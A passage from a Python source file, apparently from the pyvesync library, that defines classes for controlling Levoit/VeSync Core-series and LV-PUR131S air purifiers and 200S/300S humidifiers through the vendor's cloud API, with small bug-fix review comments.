        """Toggle display on/off; returns True on API success."""
        if not isinstance(mode, bool):
            logger.debug("Mode must be True or False")
            return False
        head, body = self.__build_api_dict('setDisplay')
        # Guard added for consistency with the other setters.
        if not head and not body:
            return False
        body['payload']['data'] = {
            'state': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug("Error toggling Core200S display - %s",
                     self.device_name)
        return False

    def turn_on_display(self) -> bool:
        """Turn Display on."""
        return self.set_display(True)

    def turn_off_display(self):
        """Turn Display off."""
        return self.set_display(False)

    def change_fan_speed(self, speed: int = None) -> bool:
        """1,2,3 or call without argument to increment by 1."""
        if self.mode != 'manual':
            logger.debug('%s not in manual mode, cannot change speed',
                         self.device_name)
            return False
        try:
            level = int(self.speed)
        except KeyError:
            logger.debug(
                'Cannot change fan speed, no level set for %s',
                self.device_name
            )
            return False
        # NOTE(review): the original built a req_body/req_headers pair here
        # that was immediately discarded by __build_api_dict below; that
        # dead code has been removed.
        if speed is not None:
            if speed == level:
                return True
            if speed in [1, 2, 3]:
                level = speed
            else:
                logger.debug('Invalid fan speed for %s',
                             self.device_name)
                return False
        else:
            # No argument: cycle 1 -> 2 -> 3 -> 1.
            if (level + 1) > 3:
                level = 1
            else:
                level = int(level + 1)
        head, body = self.__build_api_dict('setLevel')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'id': 0,
            'level': level,
            'type': 'wind'
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.speed = level
            return True
        logger.warning('Error changing %s speed', self.device_name)
        return False

    def set_night_light(self, mode: str) -> bool:
        """Set night light - on, off or dim."""
        if mode.lower() not in ['on', 'off', 'dim']:
            logger.debug('Invalid nightlight mode used (on, off or dim)- %s',
                         mode)
            return False
        head, body = self.__build_api_dict('setNightLight')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'night_light': mode.lower()
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.details['night_light'] = mode.lower()
            return True
        logger.debug('Error setting nightlight mode')
        return False

    def mode_toggle(self, mode: str) -> bool:
        """Set purifier mode - sleep or manual."""
        if mode.lower() not in ['sleep', 'manual']:
            logger.debug('Invalid purifier mode used (sleep or manual)- %s',
                         mode)
            return False
        head, body = self.__build_api_dict('setPurifierMode')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'mode': mode.lower()
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug('Error setting purifier mode')
        return False

    def manual_mode(self) -> bool:
        """Set mode to manual."""
        return self.mode_toggle('manual')

    def sleep_mode(self) -> bool:
        """Set sleep mode to on."""
        return self.mode_toggle('sleep')

    def display(self) -> None:
        """Print formatted device info to stdout."""
        super().display()
        disp1 = [
            ('Mode: ', self.mode, ''),
            ('Filter Life: ', self.details['filter_life'], 'percent'),
            ('Fan Level: ', self.speed, ''),
            ('Display: ', self.details['display'], ''),
            ('Child Lock: ', self.details['child_lock'], ''),
            ('Night Light: ', self.details['night_light'], ''),
            ('Display Config: ', self.config['display'], ''),
            ('Display_Forever Config: ', self.config['display_forever'], '')
        ]
        for line in disp1:
            # Bugfix: print label, value and unit; the original printed
            # line[0] three times (cf. VeSyncAir300S400S.display).
            print(f'{line[0]:.<20} {line[1]} {line[2]}')

    def displayJSON(self) -> str:
        """Return air purifier status and properties in JSON output."""
        sup = super().displayJSON()
        sup_val = json.loads(sup)
        sup_val.update(
            {
                'Mode': self.mode,
                'Filter Life': str(self.details['filter_life']),
                'Fan Level': str(self.speed),
                'Display': self.details['display'],
                'Child Lock': self.details['child_lock'],
                'Night Light': str(self.details['night_light']),
                'Display Config': self.config['display'],
                'Display_Forever Config': self.config['display_forever'],
            }
        )
        return json.dumps(sup_val)
class VeSyncAir300S400S(VeSyncBaseDevice):
    """Core300S/400S Purifier Class."""

    def __init__(self, details, manager):
        """Initialize Core300S/400S Purifier class."""
        super().__init__(details, manager)
        self.enabled = True
        # Last-known device state, refreshed by get_details()/update().
        self.details: Dict[str, Union[str, int, float, bool]] = {
            'filter_life': 0,
            'mode': 'manual',
            'level': 0,
            'air_quality': 0,
            'display': False,
            'child_lock': False,
            'night_light': 'off',
        }
        # Display configuration reported by the device.
        self.config: Dict[str, Union[str, int, float, bool]] = {
            'display': False,
            'display_forever': False,
        }

    def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
        """Build Core300S/400S api call header and body.

        Available methods are: 'getPurifierStatus', 'setSwitch',
        'setNightLight', 'setLevel', 'setDisplay'
        'setPurifierMode', 'setChildLock'

        Returns ``({}, {})`` for an unknown method.
        """
        modes = ['getPurifierStatus', 'setSwitch', 'setNightLight',
                 'setLevel', 'setPurifierMode', 'setDisplay',
                 'setChildLock']
        if method not in modes:
            logger.debug('Invalid mode - %s', method)
            return {}, {}
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': method,
            'source': 'APP',
        }
        return head, body

    def build_purifier_dict(self, dev_dict: Dict):
        """Build Core300S/400S purifier status dictionary from an API payload."""
        self.enabled = dev_dict.get('enabled')
        if self.enabled:
            self.device_status = 'on'
        else:
            self.device_status = 'off'
        self.details['filter_life'] = dev_dict.get('filter_life', 0)
        self.details['air_quality'] = dev_dict.get('air_quality_value', 0)
        self.mode = dev_dict.get('mode', 'manual')
        self.speed = dev_dict.get('level', 0)
        # NOTE(review): the original assigned details['display'] twice;
        # the duplicate assignment has been removed.
        self.details['display'] = dev_dict.get('display', False)
        self.details['child_lock'] = dev_dict.get('child_lock', False)
        self.details['night_light'] = dev_dict.get('night_light', 'off')
        self.details['display_forever'] = dev_dict.get('display_forever',
                                                       False)

    def build_config_dict(self, conf_dict):
        """Build configuration dict for Core300S/400S purifier."""
        self.config['display'] = conf_dict.get('display', False)
        self.config['display_forever'] = conf_dict.get('display_forever',
                                                       False)

    def get_details(self) -> None:
        """Fetch current purifier status and populate details/config."""
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': 'getPurifierStatus',
            'source': 'APP',
            'data': {}
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        outer_result = r.get('result', {})
        inner_result = None
        if outer_result:
            inner_result = r.get('result', {}).get('result')
        if inner_result is not None and Helpers.code_check(r):
            if outer_result.get('code') == 0:
                self.build_purifier_dict(inner_result)
            else:
                logger.debug('error in inner result dict from purifier')
            if inner_result.get('configuration', {}):
                self.build_config_dict(inner_result.get('configuration', {}))
            else:
                logger.debug('No configuration found in purifier status')
        else:
            logger.debug('Error in purifier response')

    def update(self):
        """Update Core300S/400S Purifier details."""
        self.get_details()

    @property
    def fan_level(self) -> int:
        """Get current fan level (1-4)."""
        return int(self.speed)

    @property
    def filter_life(self) -> int:
        """Get percentage of filter life remaining."""
        try:
            return int(self.details['filter_life'])
        except KeyError:
            return 0

    @property
    def air_quality(self) -> int:
        """Get air quality value (ug/m3)."""
        try:
            return int(self.details['air_quality'])
        except KeyError:
            return 0

    @property
    def display_state(self) -> bool:
        """Get display state."""
        return bool(self.details['display'])

    @property
    def child_lock(self) -> bool:
        """Get child lock state."""
        return bool(self.details['child_lock'])

    @property
    def night_light(self) -> str:
        """Get night light state (on/dim/off)."""
        return str(self.details['night_light'])

    def toggle_switch(self, toggle: bool) -> bool:
        """Toggle purifier on/off; returns True on API success."""
        if not isinstance(toggle, bool):
            logger.debug('Invalid toggle value for purifier switch')
            return False
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'data': {
                'enabled': toggle,
                'id': 0
            },
            'method': 'setSwitch',
            'source': 'APP'
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug("Error toggling Core200S/300S purifier - %s",
                     self.device_name)
        return False

    def turn_on(self) -> bool:
        """Turn Core300S/400S Purifier on."""
        return self.toggle_switch(True)

    def turn_off(self):
        """Turn Core300S/400S Purifier off."""
        return self.toggle_switch(False)

    def child_lock_on(self) -> bool:
        """Turn Core300S/400S child lock on."""
        return self.set_child_lock(True)

    def child_lock_off(self) -> bool:
        """Turn Core300S/400S child lock off."""
        return self.set_child_lock(False)

    def set_child_lock(self, mode: bool) -> bool:
        """Set Core300S/400S child lock; returns True on API success."""
        if mode not in (True, False):
            logger.debug('Invalid mode passed to set_child_lock - %s', mode)
            return False
        head, body = self.__build_api_dict('setChildLock')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'child_lock': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.details['child_lock'] = mode
            return True
        if isinstance(r, dict):
            logger.debug('Error toggling child lock')
        else:
            logger.debug('Error in api return json for %s', self.device_name)
        return False

    def set_display(self, mode: bool) -> bool:
        """Toggle display on/off; returns True on API success."""
        if not isinstance(mode, bool):
            logger.debug("Mode must be True or False")
            return False
        head, body = self.__build_api_dict('setDisplay')
        # Guard added for consistency with the other setters.
        if not head and not body:
            return False
        body['payload']['data'] = {
            'state': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug("Error toggling Core200S/300S display - %s",
                     self.device_name)
        return False

    def turn_on_display(self) -> bool:
        """Turn Display on."""
        return self.set_display(True)

    def turn_off_display(self):
        """Turn Display off."""
        return self.set_display(False)

    def change_fan_speed(self, speed: int = None) -> bool:
        """1,2,3,4 or call without argument to increment by 1."""
        if self.mode != 'manual':
            logger.debug('%s not in manual mode, cannot change speed',
                         self.device_name)
            return False
        try:
            level = int(self.speed)
        except KeyError:
            logger.debug(
                'Cannot change fan speed, no level set for %s',
                self.device_name,
            )
            return False
        # NOTE(review): the original built a req_body/req_headers pair here
        # that was immediately discarded by __build_api_dict below; that
        # dead code has been removed.
        if speed is not None:
            if speed == level:
                return True
            if speed in [1, 2, 3, 4]:
                level = speed
            else:
                logger.debug('Invalid fan speed for %s',
                             self.device_name)
                return False
        else:
            # No argument: cycle 1 -> 2 -> 3 -> 4 -> 1.
            if (level + 1) > 4:
                level = 1
            else:
                level = int(level + 1)
        head, body = self.__build_api_dict('setLevel')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'id': 0,
            'level': level,
            'type': 'wind',
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.speed = level
            return True
        logger.warning('Error changing %s speed', self.device_name)
        return False

    def set_night_light(self, mode: str) -> bool:
        """Set night light - on, off or dim."""
        if mode.lower() not in ['on', 'off', 'dim']:
            logger.debug('Invalid nightlight mode used (on, off or dim)- %s',
                         mode)
            return False
        head, body = self.__build_api_dict('setNightLight')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'night_light': mode.lower()
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.details['night_light'] = mode.lower()
            return True
        logger.debug('Error setting nightlight mode')
        return False

    def mode_toggle(self, mode: str) -> bool:
        """Set purifier mode - sleep or manual or auto."""
        if mode.lower() not in ['sleep', 'manual', 'auto']:
            logger.debug(
                'Invalid purifier mode used (sleep or manual or auto)- %s',
                mode,
            )
            return False
        head, body = self.__build_api_dict('setPurifierMode')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'mode': mode.lower()
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug('Error setting purifier mode')
        return False

    def auto_mode(self) -> bool:
        """Set mode to auto."""
        return self.mode_toggle('auto')

    def manual_mode(self) -> bool:
        """Set mode to manual."""
        return self.mode_toggle('manual')

    def sleep_mode(self) -> bool:
        """Set sleep mode to on."""
        return self.mode_toggle('sleep')

    def display(self) -> None:
        """Print formatted device info to stdout."""
        super().display()
        disp1 = [
            ('Mode: ', self.mode, ''),
            ('Filter Life: ', self.details['filter_life'], 'percent'),
            ('Air Quality: ', self.details['air_quality'], 'ug/m3'),
            ('Fan Level: ', self.speed, ''),
            ('Display: ', self.details['display'], ''),
            ('Child Lock: ', self.details['child_lock'], ''),
            ('Night Light: ', self.details['night_light'], ''),
            ('Display Config: ', self.config['display'], ''),
            ('Display_Forever Config: ', self.config['display_forever'], ''),
        ]
        for line in disp1:
            print(f'{line[0]:.<20} {line[1]} {line[2]}')

    def displayJSON(self) -> str:
        """Return air purifier status and properties in JSON output."""
        sup = super().displayJSON()
        sup_val = json.loads(sup)
        sup_val.update(
            {
                'Mode': self.mode,
                'Filter Life': str(self.details['filter_life']),
                'Air Quality': str(self.details['air_quality']),
                'Fan Level': str(self.speed),
                'Display': self.details['display'],
                'Child Lock': self.details['child_lock'],
                'Night Light': str(self.details['night_light']),
                'Display Config': self.config['display'],
                'Display_Forever Config': self.config['display_forever'],
            }
        )
        return json.dumps(sup_val)
class VeSyncAir131(VeSyncBaseDevice):
    """Levoit Air Purifier Class (LV-PUR131S family).

    Uses the legacy ``/131airPurifier`` API endpoints rather than the
    bypassV2 interface used by newer devices.  Device state is cached in
    ``self.details`` and refreshed by :meth:`update`.
    """

    def __init__(self, details, manager):
        """Initialize air purifier class."""
        super().__init__(details, manager)
        # Populated by get_details(); empty until the first update().
        self.details: Dict = {}

    def get_details(self) -> None:
        """Build Air Purifier details dictionary from the device API."""
        body = Helpers.req_body(self.manager, 'devicedetail')
        body['uuid'] = self.uuid
        head = Helpers.req_headers(self.manager)
        r, _ = Helpers.call_api(
            '/131airPurifier/v1/device/deviceDetail',
            method='post',
            headers=head,
            json=body,
        )
        if r is not None and Helpers.code_check(r):
            self.device_status = r.get('deviceStatus', 'unknown')
            self.connection_status = r.get('connectionStatus', 'unknown')
            self.details['active_time'] = r.get('activeTime', 0)
            # filterLife is a nested dict (see filter_life property).
            self.details['filter_life'] = r.get('filterLife', {})
            self.details['screen_status'] = r.get('screenStatus', 'unknown')
            self.mode = r.get('mode', self.mode)
            self.details['level'] = r.get('level', 0)
            self.details['air_quality'] = r.get('airQuality', 'unknown')
        else:
            logger.debug('Error getting %s details', self.device_name)

    def get_config(self) -> None:
        """Get configuration info for air purifier."""
        body = Helpers.req_body(self.manager, 'devicedetail')
        body['method'] = 'configurations'
        body['uuid'] = self.uuid
        r, _ = Helpers.call_api(
            '/131airpurifier/v1/device/configurations',
            'post',
            headers=Helpers.req_headers(self.manager),
            json=body,
        )
        # Guard against a failed call returning None before code_check,
        # consistent with the other API-response checks in this class.
        if r is not None and Helpers.code_check(r):
            self.config = Helpers.build_config_dict(r)
        else:
            logger.warning('Unable to get config info for %s',
                           self.device_name)

    @property
    def active_time(self) -> int:
        """Return total time active in minutes."""
        return self.details.get('active_time', 0)

    @property
    def fan_level(self) -> int:
        """Get current fan level (1-3)."""
        return self.details.get('level', 0)

    @property
    def filter_life(self) -> int:
        """Get percentage of filter life remaining."""
        try:
            return self.details['filter_life'].get('percent', 0)
        except KeyError:
            return 0

    @property
    def air_quality(self) -> str:
        """Get Air Quality."""
        return self.details.get('air_quality', 'unknown')

    @property
    def screen_status(self) -> str:
        """Return Screen status (on/off)."""
        return self.details.get('screen_status', 'unknown')

    def turn_on(self) -> bool:
        """Turn Air Purifier on.

        Returns True when the device is already on or was switched on
        successfully (mirrors turn_off(), which reports success when
        already off).
        """
        if self.device_status == 'on':
            return True
        body = Helpers.req_body(self.manager, 'devicestatus')
        body['uuid'] = self.uuid
        body['status'] = 'on'
        head = Helpers.req_headers(self.manager)
        r, _ = Helpers.call_api(
            '/131airPurifier/v1/device/deviceStatus', 'put',
            json=body, headers=head
        )
        if r is not None and Helpers.code_check(r):
            self.device_status = 'on'
            return True
        logger.warning('Error turning %s on', self.device_name)
        return False

    def turn_off(self) -> bool:
        """Turn Air Purifier Off.

        Returns True when the device is already off or was switched off
        successfully.
        """
        if self.device_status == 'on':
            body = Helpers.req_body(self.manager, 'devicestatus')
            body['uuid'] = self.uuid
            body['status'] = 'off'
            head = Helpers.req_headers(self.manager)
            r, _ = Helpers.call_api(
                '/131airPurifier/v1/device/deviceStatus', 'put',
                json=body, headers=head
            )
            if r is not None and Helpers.code_check(r):
                self.device_status = 'off'
                return True
            logger.warning('Error turning %s off', self.device_name)
            return False
        return True

    def auto_mode(self) -> bool:
        """Set mode to auto."""
        return self.mode_toggle('auto')

    def manual_mode(self) -> bool:
        """Set mode to manual."""
        return self.mode_toggle('manual')

    def sleep_mode(self) -> bool:
        """Set sleep mode to on."""
        return self.mode_toggle('sleep')

    def change_fan_speed(self, speed: int = None) -> bool:
        """Adjust Fan Speed for air purifier.

        Specifying 1,2,3 as argument or call without argument to cycle
        through speeds increasing by one (wrapping from 3 back to 1).
        Only valid while the device is in manual mode.
        """
        if self.mode != 'manual':
            logger.debug('%s not in manual mode, cannot change speed',
                         self.device_name)
            return False
        try:
            level = self.details['level']
        except KeyError:
            logger.debug(
                'Cannot change fan speed, no level set for %s',
                self.device_name
            )
            return False
        body = Helpers.req_body(self.manager, 'devicestatus')
        body['uuid'] = self.uuid
        head = Helpers.req_headers(self.manager)
        if speed is not None:
            if speed == level:
                # Already at the requested speed - nothing to do.
                return True
            if speed in [1, 2, 3]:
                body['level'] = speed
            else:
                logger.debug('Invalid fan speed for %s',
                             self.device_name)
                return False
        else:
            # No speed supplied - cycle to the next level, wrapping at 3.
            if (level + 1) > 3:
                body['level'] = 1
            else:
                body['level'] = int(level + 1)
        r, _ = Helpers.call_api(
            '/131airPurifier/v1/device/updateSpeed', 'put',
            json=body, headers=head
        )
        if r is not None and Helpers.code_check(r):
            self.details['level'] = body['level']
            return True
        logger.warning('Error changing %s speed', self.device_name)
        return False

    def mode_toggle(self, mode: str) -> bool:
        """Set mode to manual, auto or sleep.

        'manual' resets the fan level to 1.  Returns False (with a
        warning) for an unknown mode or when the device is already in
        the requested mode.
        """
        head = Helpers.req_headers(self.manager)
        body = Helpers.req_body(self.manager, 'devicestatus')
        body['uuid'] = self.uuid
        if mode != self.mode and mode in ['sleep', 'auto', 'manual']:
            body['mode'] = mode
            if mode == 'manual':
                body['level'] = 1
            r, _ = Helpers.call_api(
                '/131airPurifier/v1/device/updateMode', 'put',
                json=body, headers=head
            )
            if r is not None and Helpers.code_check(r):
                self.mode = mode
                return True
        logger.warning('Error setting %s mode - %s', self.device_name, mode)
        return False

    def update(self) -> None:
        """Run function to get device details."""
        self.get_details()

    def display(self) -> None:
        """Print formatted device info to stdout."""
        super().display()
        disp1 = [
            ('Active Time : ', self.active_time, ' minutes'),
            ('Fan Level: ', self.fan_level, ''),
            ('Air Quality: ', self.air_quality, ''),
            ('Mode: ', self.mode, ''),
            ('Screen Status: ', self.screen_status, ''),
            ('Filter Life: ', self.filter_life, ' percent'),
        ]
        for line in disp1:
            print(f'{line[0]:.<15} {line[1]} {line[2]}')

    def displayJSON(self) -> str:
        """Return air purifier status and properties in JSON output."""
        sup = super().displayJSON()
        sup_val = json.loads(sup)
        sup_val.update(
            {
                'Active Time': str(self.active_time),
                'Fan Level': self.fan_level,
                'Air Quality': self.air_quality,
                'Mode': self.mode,
                'Screen Status': self.screen_status,
                'Filter Life': str(self.filter_life),
            }
        )
        # Bug fix: previously returned the dict itself, violating the
        # declared -> str contract and the convention of the sibling
        # device classes, which serialize with json.dumps().
        return json.dumps(sup_val)
class VeSyncHumid200300S(VeSyncBaseDevice):
    """200S/300S Humidifier Class.

    Uses the bypassV2 cloud API.  Device state is cached in
    ``self.details`` and configuration in ``self.config``; both are
    refreshed by :meth:`update`.
    """

    def __init__(self, details, manager):
        """Initialize 200S/300S Humidifier class."""
        super().__init__(details, manager)
        self.enabled = True
        # Only some models in this family have a night light.
        if 'nightlight' in air_features.get(details['deviceType']):
            self.night_light = True
        else:
            self.night_light = False
        self.details: Dict[str, Union[str, int, float]] = {
            'humidity': 0,
            'mist_virtual_level': 0,
            'mist_level': 0,
            'mode': 'manual',
            'water_lacks': False,
            'humidity_high': False,
            'water_tank_lifted': False,
            'display': False,
            'automatic_stop_reach_target': False,
        }
        if self.night_light:
            self.details['night_light_brightness'] = 0
        self.config: Dict[str, Union[str, int, float]] = {
            'auto_target_humidity': 0,
            'display': False,
            'automatic_stop': True
        }

    def __build_api_dict(self, method: str) -> Tuple[Dict, Dict]:
        """Build 200S/300S api call header and body.

        Available methods are: 'getHumidifierStatus', 'setAutomaticStop',
        'setSwitch', 'setNightLightBrightness', 'setVirtualLevel',
        'setTargetHumidity', 'setHumidityMode', 'setDisplay'.

        Returns a pair of empty dicts for an unrecognized method.
        """
        modes = ['getHumidifierStatus', 'setAutomaticStop',
                 'setSwitch', 'setNightLightBrightness', 'setVirtualLevel',
                 'setTargetHumidity', 'setHumidityMode', 'setDisplay']
        if method not in modes:
            logger.debug('Invalid mode - %s', method)
            return {}, {}
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': method,
            'source': 'APP'
        }
        return head, body

    def build_humid_dict(self, dev_dict: Dict):
        """Build 200S/300S humidifier status dictionary from API data."""
        self.enabled = dev_dict.get('enabled')
        self.details['humidity'] = dev_dict.get('humidity', 0)
        self.details['mist_virtual_level'] = dev_dict.get(
            'mist_virtual_level', 0)
        self.details['mist_level'] = dev_dict.get('mist_level', 0)
        self.details['mode'] = dev_dict.get('mode', 'manual')
        self.details['water_lacks'] = dev_dict.get('water_lacks', False)
        self.details['humidity_high'] = dev_dict.get('humidity_high', False)
        self.details['water_tank_lifted'] = dev_dict.get(
            'water_tank_lifted', False)
        self.details['display'] = dev_dict.get('display', False)
        self.details['automatic_stop_reach_target'] = dev_dict.get(
            'automatic_stop_reach_target', True
        )
        if self.night_light:
            self.details['night_light_brightness'] = dev_dict.get(
                'night_light_brightness', 0)

    def build_config_dict(self, conf_dict):
        """Build configuration dict for 300s humidifier."""
        self.config['auto_target_humidity'] = conf_dict.get(
            'auto_target_humidity', 0)
        self.config['display'] = conf_dict.get('display', False)
        self.config['automatic_stop'] = conf_dict.get('automatic_stop', True)

    def get_details(self) -> None:
        """Build 200S/300S Humidifier details dictionary."""
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'method': 'getHumidifierStatus',
            'source': 'APP',
            'data': {}
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        # Guard: a failed call can return None, which would previously
        # raise AttributeError on r.get() below.
        if r is None:
            logger.debug('Error in humidifier response')
            return
        outer_result = r.get('result', {})
        inner_result = None
        if outer_result is not None:
            inner_result = r.get('result', {}).get('result')
        if inner_result is not None and Helpers.code_check(r):
            if outer_result.get('code') == 0:
                self.build_humid_dict(inner_result)
            else:
                logger.debug('error in inner result dict from humidifier')
            if inner_result.get('configuration', {}):
                self.build_config_dict(inner_result.get('configuration', {}))
            else:
                logger.debug('No configuration found in humidifier status')
        else:
            logger.debug('Error in humidifier response')

    def update(self):
        """Update 200S/300S Humidifier details."""
        self.get_details()

    def toggle_switch(self, toggle: bool) -> bool:
        """Toggle humidifier on/off."""
        if not isinstance(toggle, bool):
            logger.debug('Invalid toggle value for humidifier switch')
            return False
        head = Helpers.bypass_header()
        body = Helpers.bypass_body_v2(self.manager)
        body['cid'] = self.cid
        body['configModule'] = self.config_module
        body['payload'] = {
            'data': {
                'enabled': toggle,
                'id': 0
            },
            'method': 'setSwitch',
            'source': 'APP'
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            # Keep cached state in sync with the successful API call.
            self.device_status = 'on' if toggle else 'off'
            return True
        logger.debug("Error toggling 300S humidifier - %s", self.device_name)
        return False

    def turn_on(self) -> bool:
        """Turn 200S/300S Humidifier on."""
        return self.toggle_switch(True)

    def turn_off(self) -> bool:
        """Turn 200S/300S Humidifier off."""
        return self.toggle_switch(False)

    def automatic_stop_on(self) -> bool:
        """Turn 200S/300S Humidifier automatic stop on."""
        return self.set_automatic_stop(True)

    def automatic_stop_off(self) -> bool:
        """Turn 200S/300S Humidifier automatic stop off."""
        return self.set_automatic_stop(False)

    def set_automatic_stop(self, mode: bool) -> bool:
        """Set 200S/300S Humidifier to automatic stop."""
        if mode not in (True, False):
            logger.debug(
                'Invalid mode passed to set_automatic_stop - %s', mode)
            return False
        head, body = self.__build_api_dict('setAutomaticStop')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'enabled': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        if isinstance(r, dict):
            logger.debug('Error toggling automatic stop')
        else:
            logger.debug('Error in api return json for %s', self.device_name)
        return False

    def set_display(self, mode: bool) -> bool:
        """Toggle display on/off."""
        if not isinstance(mode, bool):
            logger.debug("Mode must be True or False")
            return False
        head, body = self.__build_api_dict('setDisplay')
        # Consistency fix: guard against the empty head/body returned for
        # an invalid method, as the sibling setters do.
        if not head and not body:
            return False
        body['payload']['data'] = {
            'state': mode
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug("Error toggling 300S display - %s", self.device_name)
        return False

    def turn_on_display(self) -> bool:
        """Turn 200S/300S Humidifier display on."""
        return self.set_display(True)

    def turn_off_display(self) -> bool:
        """Turn 200S/300S Humidifier display off."""
        return self.set_display(False)

    def set_humidity(self, humidity: int) -> bool:
        """Set target 200S/300S Humidifier humidity (30-80 percent)."""
        if humidity < 30 or humidity > 80:
            logger.debug("Humidity value must be set between 30 and 80")
            return False
        head, body = self.__build_api_dict('setTargetHumidity')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'target_humidity': humidity
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug('Error setting humidity')
        return False

    def set_night_light_brightness(self, brightness: int) -> bool:
        """Set target 200S/300S Humidifier night light brightness (0-100)."""
        if not self.night_light:
            logger.debug('%s is a %s does not have a nightlight',
                         self.device_name, self.device_type)
            return False
        if brightness < 0 or brightness > 100:
            logger.debug("Brightness value must be set between 0 and 100")
            return False
        head, body = self.__build_api_dict('setNightLightBrightness')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'night_light_brightness': brightness
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        # Bug fix: previously logged 'Error setting humidity' (copy/paste).
        logger.debug('Error setting night light brightness')
        return False

    def set_humidity_mode(self, mode: str) -> bool:
        """Set humidifier mode - sleep or auto."""
        if mode.lower() not in ['sleep', 'auto']:
            logger.debug('Invalid humidity mode used (sleep or auto)- %s',
                         mode)
            return False
        head, body = self.__build_api_dict('setHumidityMode')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'mode': mode.lower()
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug('Error setting humidity mode')
        return False

    def set_mist_level(self, level: int) -> bool:
        """Set humidifier mist level with int between 1 - 9."""
        # Bug fix: docstring/log previously claimed 0-9 but the check has
        # always rejected 0; the accepted range is 1-9.
        if level < 1 or level > 9:
            logger.debug('Humidifier mist level must be between 1 and 9')
            return False
        head, body = self.__build_api_dict('setVirtualLevel')
        if not head and not body:
            return False
        body['payload']['data'] = {
            'id': 0,
            'level': level,
            'type': 'mist'
        }
        r, _ = Helpers.call_api(
            '/cloud/v2/deviceManaged/bypassV2',
            method='post',
            headers=head,
            json=body,
        )
        if Helpers.code_check(r):
            return True
        logger.debug('Error setting mist level')
        return False

    def display(self) -> None:
        """Print formatted device info to stdout."""
        super().display()
        disp1 = [
            ('Mode: ', self.details['mode'], ''),
            ('Humidity: ', self.details['humidity'], 'percent'),
            ('Mist Virtual Level: ', self.details['mist_virtual_level'], ''),
            ('Mist Level: ', self.details['mist_level'], ''),
            ('Water Lacks: ', self.details['water_lacks'], ''),
            ('Humidity High: ', self.details['humidity_high'], ''),
            ('Water Tank Lifted: ', self.details['water_tank_lifted'], ''),
            ('Display: ', self.details['display'], ''),
            ('Automatic Stop Reach Target: ',
             self.details['automatic_stop_reach_target'], ''),
            ('Auto Target Humidity: ',
             self.config['auto_target_humidity'], 'percent'),
            ('Automatic Stop: ', self.config['automatic_stop'], ''),
        ]
        if self.night_light:
            disp1.append(('Night Light Brightness: ',
